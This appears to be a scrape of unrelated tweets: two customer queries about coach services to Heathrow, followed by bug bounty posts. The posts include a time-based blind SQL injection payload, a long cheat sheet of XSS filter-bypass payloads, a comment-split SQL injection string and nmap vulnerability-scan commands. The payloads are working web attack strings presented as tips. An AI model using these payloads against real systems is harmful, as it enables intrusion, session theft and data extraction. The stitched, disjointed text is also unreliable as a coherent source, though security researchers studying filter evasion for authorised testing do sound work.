@nxcare I booked a coach from Newcastle to London Heathrow for 4th at 12:30 (overnight service), but it’s not showing on the tracker. Could you confirm if the service is running on time?
Hello @nxcare please confirm that the NX230 (Notts to LHR) on 15th march at 7.30 am will be on time and not affected by M25 motorway roadworks. I have a flight to catch, and I can’t afford to be late.
always play with Post Request and stop using sqlmap 🤗
Ghauri is really excellent in this field
Payload ; 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
Just scored a reward @intigriti, check my profile: https://t.co/gWptipqmz8 #HackWithIntigriti#bugbounty#bugbountytip
My guide to creating the perfect bug bounty automation! 🪲🔫🤖
This blog discusses ways in which you can start to automate bug bounty hunting!👇
https://t.co/FfVuyGEdSK
🚨Tool Alert !! 🚨
For the past few days I have been playing with @streamlit and I must say it's awesome to spin up quick prototypes
I created this BugBounty Helper Tool Kit & it merely took 10 minutes, check out👇
https://t.co/OK8iuOdkoB
#bugbounty#bugbountytips#cybersecurity
🚨 Just published a new blog!
How I was able to takeover any account.
Cognito full account takeover writeup.
https://t.co/zw1dAu8NM3
Enjoy the read!
#writeup#togetherwehitharder#bugbountytips
Cloud security folks!
If you're studying for an AWS, Microsoft or Google cloud security certification, did you know that @PwnedLabs has 30 FREE hands-on cloud security labs to supplement your learning?
That's over 40 hours real-world scenarios for red and blue - for free. Many labs are also byte-sized and can be done in a lunchtime.
Good luck in achieving your certifications and in your cloud security journey!
➡️ https://t.co/sfbo7Y1OMn
Daily Notes : Day 78
REGEX BYPASSES
<sCrIpT>alert(XSS)</sCriPt>
#changing the case of the tag
<<script>alert(XSS)</script>
#prepending an additional "<"
<script>alert(XSS) //
#removing the closing tag
<script>alert`XSS`</script>
#using backticks instead of parenetheses
java%0ascript:alert(1)
#using encoded newline characters
<iframe src=https://t.co/8zitIlda5z <
#double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE>
#uncommon tags
<img/src=1/onerror=alert(0)>
#bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
#extra characters
Function("ale"+"rt(1)")();
#using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176
#octal encoding
<iframe src="javascript:alert(`xss`)">
#unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3--
#using comments in SQL query to break up statement
new Function`alt\`6\``;
#using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
#base64 encoding the javascript
%26%2397;lert(1)
#using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)">
#Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
#use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
References: https://t.co/THqZ8qa2YC
3 ways to use Nmap as a vulnerabiltiy scanner
🐛 nmap -sV --script vuln <target>
🪲 nmap -sV --script vulners.nse <target>
🐞 nmap -sV --script vulscan/vulscan.nse <target>
Details on using vulscan in thread 🧵👇